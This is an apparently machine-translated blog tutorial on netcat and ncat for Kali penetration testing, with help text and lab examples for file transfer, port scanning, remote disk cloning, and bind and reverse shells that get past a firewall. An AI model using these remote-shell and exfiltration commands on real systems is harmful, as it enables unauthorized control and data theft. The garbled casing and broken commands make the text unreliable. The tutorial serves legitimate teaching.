Kali penetration test 1-netcat

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is the designed to be a reliable "back-end" tool which can be used directly or easily driven by other programs and scripts. At the same time, it's a Feature-rich network debugging and Exploration tool, since it can create almost any kind of conn Ection you would need and have several interesting built-in capabilities.

The GNU Netcat--Official homepage

Help information:

Nc-h:connect to SOMEWHERE:NC [-options] hostname port[s] [ports] ... listen for inbound:nc-l-P port [-options] [Hostnam E] [port]options:-c shell Commandsas '-e '; Use/bin/sh to exec [dangerous!!] -e Filenameprogram to exec after connect [dangerous!!] -ballow broadcasts-g gatewaysource-routing Hop Point[s], up to 8-g numsource-routing Pointer:4, 8, ...-hthis cruft-i Secsdelay interval for lines sent, ports scanned-        k                      set keepalive option on Socket-llisten mode, for inbound Conne Cts-nnumeric-only IP addresses, no dns-o filehex dump of traffic-p portlocal Port number-rrandomize local and remote ports -Q Secsquit after EOF on stdin and delay of secs-s addrlocal source address-t tosset Type of Service-tanswer TELNET Negoti ATION-UUDP Mode-vverbose [use twice-be + verbose]-w Secstimeout for connects and final net Reads-csend CRLF as line- ENDING-ZZERO-I/O mode [used for scanning]

　　

A: Server IP 192.168.192.144

B: Client IP 192.168.192.100

1. Normal port connection

NC-NV 192.168.192.144 #连接A服务武器的80端口

Direct communication:

Server A:nc-l-P 333 #开启并监听333端口

Client B:NC-NV 192.168.192.144 333

2. Transferring text messages

Server A:nc-l-P 333

Client B:ls-l | NC-NV 192.168.192.144 333 #显示A的目录信息

Server A:nc-l-P 333 >message.txt

Client B:ps aux | grep SSH | NC-NV 192.168.192.144 333-q 1 #ssh进程信息传输给A

3. Transferring files

Server A:nc-l-P 333 > From_bclient.mp4 #接受文件端

Client B:NC-NV 192.168.192.144 333 < my.mp4-q 1 #发送文件端

-Q 1: Exit after 1 seconds of transmission end

Server A:nc-l-P 333 < A.mp4-q 1 #发送文件端

Client B:NC-NV 192.168.192.144 333 > From_a.mp4 #接收文件端

4. Transfer Directory

a:tar-cvf-notebooks/| NC-LP 192.168.192.144-q 1

B:NC-NV 192.168.192.144 333 | TAR-XVF-

5. Transferring encrypted files

A:NC-LP 333 | MCrypt--flush-fbqd-a rijndael-256-m ECB > Fromb.mp4

B:mcrypt--flush-fbqd-a rijndael-256-m ECB < My.mp4 | NC-NV 192.168.192.144 333-q 1

6. Streaming Media Services

A:cat A.mp4 | NC LP 333 #流媒体服务端

B:NC-NV 192.168.192.144 333 | MPLAYER-VO X11-cache 3000-

MPlayer: command-mode player

7. Port Scan

Nc-nvz 192.168.190.144 1-1024 #扫描A的1-Port 1024th default scan TCP port

Nc-nvzu 192.168.190.144 1-1024 #扫描UDP端口

8. Remote hard disk/memory clone

A:NC LP 333 | DD OF=/DEV/DSA

B:DD IF=/DEV/SDA | NC-NV 192.168.192.144 333-q 1

9. Remote CONTROL

B Control A

A:NC-LP 333-c Bash

B:NC 192.168.192.144 333

Note:

A's firewall is closed all Port B cannot control a through the connection port, B turns on and listens on port 333, let a active to connect

B Control A

A:NC 192.168.192.100 333-c Bash

B:NC-LP 333

NC lacks encryption and authentication, and the information transmitted directly is addressed in plaintext:ncat

usage:ncat [options] [hostname] [port]options taking a time assume seconds.  Append ' Ms ' for milliseconds, ' s ' for seconds, ' m ' for minutes, or ' H ' for hours (e.g. 500ms). -4 use IPv4 only-6 with IPv6 only-u,--unixsock use Unix do Main sockets Only-c,--crlf use CRLF for EOL sequence-c,--sh-exec <command> executes the GIV En command via/bin/sh-e,--exec <command> executes the given command--lua-exec <filename> exec         Utes the given Lua script-g HOP1[,HOP2,...]   Loose Source routing Hop points (8 max)-G <n> Loose Source Routing Hop pointer (4, 8, 12, ...) -M,--max-conns <n> Maximum <n> simultaneous connections-h,--help Display this hel  P screen-d,--delay <time> Wait between Read/writes-o,--output <filename> Dump session data to  A file-x,--hex-dump <filename>Dump session data as Hex to a file-i,--idle-timeout <time> idle read/write timeout-p,--source-port Port S               Pecify source port to Use-s,--source addr Specify Source address to use (doesn ' t affect-l)-L,--listen  Bind and listen for incoming connections-k,--keep-open Accept multiple connections in listen mode -N,--nodns do not resolve hostnames via dns-t,--telnet Answer telnet negotiations-u,- -UDP use UDP instead of the default TCP--SCTP use SCTP instead of default tcp-v,--ve                         Rbose Set verbosity level (can be used several times)-W,--wait <time> Connect timeout-z  ZERO-I/O mode, report connection status only--append-output append rather than clobber Specified output files--send-only only send data, ignoring received; Quit on EOF--recv-only only receive data,Never send anything--allow allow only given hosts to connect to Ncat--allowfile A fi Le of hosts allowed to connect to NCAT--deny deny given hosts from connecting to Ncat--denyfil e A file of the hosts denied from connecting to Ncat--broker Enable ncat ' s connection brokerin G Mode--chat Start a simple ncat chat server--proxy <addr[:p ort]> specify address of HO St to proxy through--proxy-type <type> specify proxy type ("http" or "SOCKS4" or "SOCKS5")--proxy-aut      H <auth> authenticate with HTTP or SOCKS proxy server--ssl Connect or listen with SSL --ssl-cert Specify SSL certificate file (PEM) for listening--ssl-key specify SSL private K        EY (PEM) for listening--ssl-verify Verify trust and domain name of certificates--ssl-trustfile PEM file containing TRUsted SSL Certificates--ssl-ciphers cipherlist containing SSL ciphers to use--SSL-ALPN AL      PN protocol list to use.　 --version Display ncat ' s version information and exit

A:

Ncat-c Bash--allow 192.168.192.100-vnl 333--ssl #允许192.168.192.100 Connect SSL Encryption

B:

NCAT-NV 192.168.192.144 333--ssl

A:

B:

Reprint please indicate the source.

Posted on 2018-04-23

Kali penetration test 1-netcat